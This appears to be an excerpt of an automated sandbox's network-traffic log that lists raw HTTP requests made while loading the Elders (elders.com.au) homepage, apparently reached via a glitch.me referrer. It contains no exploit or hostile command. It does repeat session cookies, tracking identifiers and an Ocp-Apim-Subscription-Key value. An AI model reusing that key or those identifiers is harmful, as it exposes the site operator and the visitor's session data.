Source: global trafficHTTP traffic detected: GET /bin/el/local-branch?branchId=1669702755463&type=default HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /.model.json HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793807974&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger;navigation-source, event-sourceReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF&co=aHR0cHM6Ly9lbGRlcnMuY29tLmF1OjQ0Mw..&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=w6adpcix7pmi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793807974&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /40cb4d5b590922d8.js HTTP/1.1Host: yourir.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793807974&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bin/el/local-branch?branchId=1669702755463&type=default HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /api/v1/WeatherDetail?postCode=5000 HTTP/1.1Host: apimprd.ext.elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Ocp-Apim-Subscription-Key: 93e156a515ad4dd497c991b125dffcc2sec-ch-ua-platform: "Windows"Origin: https://elders.com.auSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /.model.json/ HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /maps/embed?pb=!1m18!1m12!1m3!1d3271.301151004918!2d138.60046118650763!3d-34.92398350209179!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ab0cf2819431915%3A0x60d544ef0a2f07e6!2sElders!5e0!3m2!1sen!2sau!4v1669702553968!5m2!1sen!2sau HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /lib/1.15.18/yourir.css HTTP/1.1Host: yourir.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /40cb4d5b590922d8.js HTTP/1.1Host: yourir.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bin/el/localised-news?branchId= HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /errors/500/ HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /api/v1/WeatherDetail?postCode=5000 HTTP/1.1Host: apimprd.ext.elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Ocp-Apim-Subscription-Key: 93e156a515ad4dd497c991b125dffcc2sec-ch-ua-platform: "Windows"Origin: https://elders.com.auSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/v1/WeatherDetail?postCode=5000 HTTP/1.1Host: apimprd.ext.elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; _fbp=fb.2.1730793804748.70395038985089435; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
